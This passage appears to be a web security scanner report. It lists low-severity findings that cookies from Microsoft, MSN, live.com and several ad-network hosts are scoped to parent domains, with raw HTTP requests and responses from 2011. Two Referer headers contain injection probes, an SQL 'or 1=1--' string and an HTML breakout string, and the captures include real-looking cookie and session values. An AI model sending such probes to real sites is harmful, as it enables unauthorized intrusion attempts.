Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www52
Content-Length: 0
Content-Type: text/plain
Connection: close

16.156. http://music.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.redacted
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=d50ddeb179d249659073f8d313a6170a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: music.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.157. http://my.live.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.live.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

mktstate=S=306174342&U=&E=&P=&B=en; domain=live.com; path=/
mkt1=norm=en-us; domain=live.com; path=/
lastMarket=en-us; domain=.live.com; path=/
lastMktPath=en/us; domain=.live.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: my.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:04 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: WEBA01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://my.redacted
Set-Cookie: mktstate=S=306174342&U=&E=&P=&B=en; domain=live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=live.com; path=/
Set-Cookie: mkt2=ui=en-us; domain=my.live.com; path=/
Set-Cookie: lastMarket=en-us; domain=.live.com; path=/
Set-Cookie: lastMktPath=en/us; domain=.live.com; path=/
Set-Cookie: frm=true; domain=.live.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://my.redacted">here</a>.</h2>
</body></html>

16.158. http://my.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.redacted
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=992d4dfe4a3a437b8a4c171fc7cceb14; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: my.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:50:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPMYREN04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345018&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2f&lc=1033&id=254014
Set-Cookie: MC1=V=3&GUID=992d4dfe4a3a437b8a4c171fc7cceb14; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 287

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345018&rver=5.5.4177.0&wp=mbi&wrep
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc03049.popsci.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=rcHW801FnNEABrjk; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.popsci.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05? HTTP/1.1
Host: oasc03049.popsci.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52

Response

16.160. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.scientificamerican.com
Path:	/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=rcHW801FnIUACoU2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.scientificamerican.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41?observations&&&referrer=http://burp/show/60 HTTP/1.1
Host: oascentral.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

16.161. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/bing/ff808490.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAABHBwAAm7TtVgJMvgFAgnqZu/TJhg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/bing/ff808490.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAABHBwAAm7TtVgJMvgFAgnqZu/TJhg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:25 GMT
Content-Length: 34741

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.162. http://onlinehelp.microsoft.com/en-us/msn/money.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/money.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAADfBgAA2AXSEcBOJjoMRri+WPCcHQ!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/money.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADfBgAA2AXSEcBOJjoMRri+WPCcHQ!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:23 GMT
Content-Length: 26482

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.163. http://onlinehelp.microsoft.com/en-us/msn/qwlinfo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/qwlinfo.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAADHCAAA266j5xBE5bvLgdGilVUO5Q!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/qwlinfo.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADHCAAA266j5xBE5bvLgdGilVUO5Q!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:27 GMT
Content-Length: 28036

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.164. http://onlinehelp.microsoft.com/en-us/msn/qwlnotyours.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/qwlnotyours.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAAAVBwAAg+A0N79NlMCN1BebkgAdCA!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/qwlnotyours.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAAVBwAAg+A0N79NlMCN1BebkgAdCA!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:26 GMT
Content-Length: 24860

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.165. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://onlinehelp.microsoft.com
Path:	/en-us/msn/thebasics.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAAAKBwAA5krr+oNHqj3Y35ynMPVKcA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/thebasics.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAAKBwAA5krr+oNHqj3Y35ynMPVKcA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:26 GMT
Content-Length: 21044

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

16.166. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7665/13236/25159-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; expires=Sat, 30-Apr-2011 01:29:43 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
rdk=7665/13236; expires=Sun, 30-Jan-2011 02:29:43 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=7531^1&13236^1; expires=Mon, 31-Jan-2011 05:59:59 GMT; max-age=109816; path=/; domain=.rubiconproject.com
csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; expires=Sun, 06-Feb-2011 01:29:43 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7665/13236/25159-2.js?cb=0.7269156167749316 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; ruid=154d290e46adc1d6f373dd09^6^1296308324^2915161843; ses2=7531^1; csi2=328960.js^1^1296308415^1296308415&3174527.js^6^1296226121^1296232923&3138805.js^3^1296224077^1296232921&3178295.js^1^1296226112^1296226112; ses9=9320^1&7531^1; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:43 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; expires=Sat, 30-Apr-2011 01:29:43 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7665/13236; expires=Sun, 30-Jan-2011 02:29:43 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 30-Jan-2011 02:29:43 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=7531^1&13236^1; expires=Mon, 31-Jan-2011 05:59:59 GMT; max-age=109816; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; expires=Sun, 06-Feb-2011 01:29:43 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2402

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3186999"
...[SNIP]...

16.167. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/A06546/b3/0/3/1003161/543149170.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d69b449&0&&4d43b3c1&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Sun, 27-Feb-2011 02:17:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /A06546/b3/0/3/1003161/543149170.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLv3NSMJaSpn3g1FgecyID/YTWjxcmn+jRwDtK6yKGSqLiDCbz2rscDhNkPJfBSzlL4dxsqrgwGwTcU0yVOl93x0bsnVOXBsYOd//QgpPolrbS4+Nw8pZmwuLu/BFF7QsvnGgRit9IQdrMe68QJG+xARlbfeqCut/4QAwRNJQR/XlVBysq/jrFHdWb+7tcucPJDdqOzrQiKJQMWveoQqCvYVuCItXlfGZkoyggle3az/HvQUB76nGMvM6aK+iHbgmmWUZ7vTesbzpgDUtcCDBy1OP8b/EWRyH4uNf3IiIEN7uN/unTN7wj+d3aJN+S/uAmGvQTMbx92ct+tNW/fLsANU3MGbWx9PWZB8OCJZ1Jjg7/r6sb6HKhDbfUhULrzcm41SNIyqo/UPwJQztEuuuiLIririPZSp5K8cha5iUvwBePNVNuTjmqDgmws5XPyigl5UM6qcPfeQiBpeVKzEw1/Vq2msHxmzpfSHKTD8e90Ps1HEYrkFOPic6v6njtkrtHLHDXb971WO7HB/0bEjCaOTtCC9kXesDSj90s8MzA++V01FrJ3dgnIeesBl0xJxLJRIU5VhoyLHXgkVIX37uD6r7oH0cMDf2K7Eaupks0wRDpggvT5EFH8JlWlBVNXM79nOtYm2WHhGrjCqhrat51GMQL5cfCHYT3mZFcmfFrSHZGkbkOFSTPWvaB2MEzzvZmVxJjOFYAeGcJdekdsk/yPfbRlXWhTqBzXFxnBdkAVVgrh2H6Jj/iMj22RD7lrrnu0tLor5OZ8cn6Ym51edHhgpShQyzLU9V8EG0n7wfEQLBINnz6LPBtX6+8SS5RQrtiF/eGzW8dYK23z34XahxqULrJN5RQMIu5VTy7/Ghw6qjoZ/sD5mTNDI+RcSBdg0d0+9f7uCZnkisLc6SVCJ5iUT5F9LuU/+AfJo2l8alr6bDLTj2kS4UGIT3Ac5OdkWIBI/wfXDydN6T1e3I63W6L/h9vQpbrgZAA/KjPp2Yq4gjVuQsW3u4AbuNaZJ51egQSvC1zJn+6C/ibzxCxGnJ3bIiVn23LgeutuBiHfVN+6fwIGIhfLz3WmndFELqStWoNJq+LCRtr5BMYrCX5JQu49xYlIiFztxwRQPG4DDLowZx9qjXQOR8xq6IWWic6t7idKbOc4DlCW/3azG8wjO4MNyD2fCSb0csZSqhgdPg8/egWktt/TP2cZ4dhF+JU3+tmQ7e5p2; rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
